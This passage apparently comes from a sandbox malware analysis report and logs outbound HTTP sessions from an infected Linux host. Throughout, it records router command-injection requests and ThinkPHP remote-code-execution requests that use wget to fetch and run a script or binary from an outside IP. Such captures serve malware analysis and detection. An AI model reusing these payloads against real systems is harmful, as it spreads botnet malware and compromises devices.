                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:52.254349947 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:41.399569988 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        53192.168.2.235554085.90.244.1468080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:05.278592110 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:05.580466032 CEST498INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:05 GMT
                                                        Server: Apache/2.4.54 (Debian)
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.54 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        54192.168.2.235543031.200.101.988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:05.359656096 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        55192.168.2.233952094.122.233.308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:05.359724998 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        56192.168.2.234058288.99.32.15280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:06.962910891 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:07.268239975 CEST321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.25.3
                                                        Date: Sun, 14 Apr 2024 14:35:07 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        57192.168.2.235969088.193.137.17380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:06.971436977 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        58192.168.2.235766488.147.6.25280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:06.983767033 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:07.723282099 CEST1289INHTTP/1.1 200 OK
                                                        Date: Sun, 14 Apr 2024 14:36:52 GMT
                                                        Server: Apache/2.2.8 (Win32) DAV/2 mod_ssl/2.2.8 OpenSSL/0.9.8g mod_autoindex_color PHP/5.2.5
                                                        X-Powered-By: PHP/5.2.5
                                                        Set-Cookie: PHPSESSID=e8793b522be47020d4598ad2b19d3388; path=/
                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 65 53 6f 6c 61 72 20 43 75 62 6f 20 2d 20 53 69 6e 61 70 73 69 20 53 72 6c 20 2d 20 42 61 73 74 69 61 20 55 6d 62 72 61 20 28 50 47 29 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2e 2f 63 75 73 74 6f 6d 69 7a 61 74 69 6f 6e 2f 65 73 6f 6c 61 72 63 75 62 65 2f 63 73 73 2f 63 6c 61 73 73 5f 69 6e 64 65 78 2e 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2e 2f 63 75 73 74 6f 6d 69 7a 61 74 69 6f 6e 2f 65 73 6f 6c 61 72 63 75 62 65 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 2e 73 74 79 6c 65 32 39 20 7b 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 47 65 6e 65 76 61 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 72 2e 73 74 79 6c 65 2d 6f 6e 65 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 63 63 63 2c 20 23 33 33 33 2c 20 23 63 63 63 29 3b 20 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>eSolar Cubo - Sinapsi Srl - Bastia Umbra (PG)</title><link rel="stylesheet" type="text/css" href="./customization/esolarcube/css/class_index.css" /><link rel="shortcut icon" href="./customization/esolarcube/img/favicon.ico"><style type="text/css">....style29 {font-family: Arial, Helvetica, sans-serif, Geneva;color: #FFFFFF;font-weight: bold;font-size: 18px;}hr.style-one { border: 0; height: 1px; background: #333; background-image: -webkit-linear-gradient(left, #ccc, #333, #ccc); backgroun
                                                        Apr 14, 2024 16:35:07.723383904 CEST1289INData Raw: 64 2d 69 6d 61 67 65 3a 20 20 20 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 63 63 63 2c 20 23 33 33 33 2c 20 23 63 63 63 29 3b 20 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20
                                                        Data Ascii: d-image: -moz-linear-gradient(left, #ccc, #333, #ccc); background-image: -ms-linear-gradient(left, #ccc, #333, #ccc); background-image: -o-linear-gradient(left, #ccc, #333, #ccc); width : 100%; }--></style>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        59192.168.2.235951095.0.196.21280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:06.999383926 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        60192.168.2.233372494.121.68.1238080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.076193094 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        61192.168.2.2356648112.164.97.18180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.249524117 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:07.553045034 CEST504INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Sun, 14 Apr 2024 14:35:06 GMT
                                                        Server: lighttpd/1.4.32
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        62192.168.2.234464095.217.161.6580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.283636093 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:07.605154037 CEST494INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:07 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 300
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 35 6b 35 67 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 5k5g.top Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        63192.168.2.233681494.12.162.928080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.367957115 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        64192.168.2.235382631.121.98.748080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.380381107 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:07.684120893 CEST399INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 15:36:12 GMT
                                                        Server: Webs
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        65192.168.2.234218862.72.20.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.402117968 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:07.728044033 CEST88INHTTP/1.0 400 Bad Request
                                                        Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                                        Data Ascii: Client sent an HTTP request to an HTTPS server.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        66192.168.2.235692494.123.101.198080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.416759968 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        67192.168.2.234299694.121.31.1498080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.416922092 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        68192.168.2.2358500112.92.61.2880
                                                        TimestampBytes transferredDirectionData
